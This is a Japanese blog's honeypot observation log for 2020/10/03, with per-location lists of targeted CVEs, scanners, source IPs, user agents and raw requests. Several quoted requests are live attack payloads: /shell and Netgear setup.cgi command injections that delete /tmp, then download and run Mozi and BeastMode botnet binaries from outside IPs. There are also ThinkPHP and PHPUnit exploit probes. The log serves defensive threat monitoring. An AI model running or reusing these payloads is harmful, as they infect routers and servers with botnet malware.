コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/10/03 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2020/10/03分です。

特徴
Location:JP

GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセスnetgear
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

Location:UK

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 192.210.239.115/beastmode/b3astmode.arm7;
chmod 777 /tmp/b3astmode.arm7;
sh /tmp/b3astmode.arm7 BeastMode.Rep.Jaws
Location:SG

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//178[.]210[.]158[.]138:42888/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:155 (前日比:+120)
US:総アクセス数:134 (前日比:+106)
UK:総アクセス数:29 (前日比:-8)
SG:総アクセス数:125 (前日比:-205)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 34.64.97.96 United States
1 52.229.115.133 United States
1 52.231.153.210 United States
1 61.54.56.122 China
1 61.219.11.153 Taiwan
1 66.42.127.220 United States
1 116.75.194.123 India
101 117.239.245.82 India
1 128.127.105.122 Sweden
1 156.96.128.174 United States
1 170.130.55.49 United States
25 171.14.102.152 China
7 176.113.115.214 Russia
1 182.121.51.163 China
1 185.39.11.105 Switzerland
1 185.132.53.14 Germany
3 185.153.199.102 Russia
1 192.241.234.202 United States
1 195.154.60.239 France
4 199.195.253.117 United States

UserAgent一覧

件数 UserAgent
7 -
1 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0
126 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
4 ZmEu

リクエスト内容一覧

件数 Method Request Protocol
2 -
2 \x03
1 \x16\x03\x01\x02
5 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /db/scripts/setup.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /mysqladmin/scripts/setup.php HTTP/1.1
126 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]121[.]95[.]246:35056/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET http://www.google.com HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 27.210.188.149 China
1 34.84.158.17 United States
101 49.77.71.62 China
4 93.174.95.106 Netherlands
1 115.229.226.252 China
1 159.65.138.62 United States
1 162.250.97.235 United States
17 176.113.115.214 Russia
1 185.39.11.105 Switzerland
1 185.132.53.14 Germany
1 185.202.1.202 Russia
1 192.241.235.124 United States
1 192.241.236.64 United States
1 195.154.60.239 France
1 222.140.161.242 China

UserAgent一覧

件数 UserAgent
6 -
1 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
2 Mozilla/5.0 zgrab/0.x
1 curl/7.47.0
1 python-requests/2.23.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
2 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
3 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
3 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /favicon.ico HTTP/1.1
3 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
3 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 GET http[:]//httpbin[.]org/get?key1=value1 HTTP/1.1
3 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 27.210.155.54 China
1 34.64.97.96 United States
1 45.145.67.170 Russia
2 46.16.99.147 Russia
1 52.231.153.210 United States
1 59.36.160.84 China
1 61.219.11.153 Taiwan
1 115.61.96.183 China
2 119.28.54.226 China
1 162.243.128.127 United States
10 176.113.115.214 Russia
1 182.116.97.253 China
1 185.39.11.105 Switzerland
1 185.132.53.14 Germany
1 192.241.232.162 United States
1 192.241.236.248 United States
1 194.61.55.248 Russia
1 195.154.60.239 France

UserAgent一覧

件数 UserAgent
6 -
1 Go-http-client/1.1
1 Hello, world
2 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1 Mozilla/5.0
2 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x03
1 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /phpmyadmin HTTP/1.1
3 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+192.210.239.115/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET http://www.google.com HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 51.116.190.185 United Kingdom
1 61.219.11.153 Taiwan
101 121.235.221.108 China
3 172.105.13.165 United States
7 176.113.115.214 Russia
1 178.210.158.138 Ukraine
1 182.117.72.1 China
1 185.39.11.105 Switzerland
1 185.132.53.14 Germany
1 195.154.60.239 France
1 198.199.106.251 United States
1 199.195.254.38 United States
5 213.246.40.146 France

UserAgent一覧

件数 UserAgent
4 -
1 Go-http-client/1.1
1 Hello, world
5 Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
1 \"Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 GET ../../proc/ HTTP
2 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /laravel/.env HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/.env HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]117[.]72[.]1:60349/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]210[.]158[.]138:42888/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET HTTP/1.1 HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1